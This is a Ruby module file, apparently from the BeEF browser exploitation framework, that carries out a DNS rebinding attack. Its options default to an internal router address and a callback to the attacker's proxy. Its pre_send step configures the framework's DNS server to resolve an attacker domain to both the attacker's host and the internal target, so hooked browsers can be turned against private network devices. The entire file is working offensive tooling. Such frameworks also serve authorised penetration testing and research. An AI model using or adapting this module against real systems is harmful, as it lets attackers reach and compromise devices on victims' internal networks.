1
#
2
# Copyright (c) 2006-2026 Wade Alcorn - [email protected]
3
# Browser Exploitation Framework (BeEF) - https://beefproject.com
4
# See the file 'doc/COPYING' for copying permission
5
#
6
class Dns_rebinding < BeEF::Core::Command
7
  def self.options
8
    domain = BeEF::Core::Configuration.instance.get('beef.module.dns_rebinding.domain')
9
    dr_config = BeEF::Core::Configuration.instance.get('beef.extension.dns_rebinding')
10
    url_callback = "http://#{dr_config['address_proxy_external']}:#{dr_config['port_proxy']}"
11
    [{
12
      'name' => 'target',
13
      'value' => '192.168.0.1'
14
    },
15
     {
16
       'name' => 'domain',
17
       'value' => domain
18
     },
19
     {
20
       'name' => 'url_callback',
21
       'value' => url_callback
22
     }]
23
  end
24

25
  def pre_send
26
    dns = BeEF::Extension::Dns::Server.instance
27
    dr_config = BeEF::Core::Configuration.instance.get('beef.extension.dns_rebinding')
28

29
    addr = dr_config['address_http_external']
30
    domain = BeEF::Core::Configuration.instance.get('beef.module.dns_rebinding.domain')
31
    target_addr = '192.168.0.1'
32

33
    target_addr = @datastore[0]['value'] if @datastore[0]
34
    domain = @datastore[1]['value'] if @datastore[1]
35

36
    id = dns.add_rule(
37
      pattern: domain,
38
      resource: Resolv::DNS::Resource::IN::A,
39
      response: [addr, target_addr]
40
    )
41

42
    dns.remove_rule!(id)
43

44
    dns.add_rule(
45
      pattern: domain,
46
      resource: Resolv::DNS::Resource::IN::A,
47
      response: [addr, target_addr]
48
    )
49
  end
50
end
51

52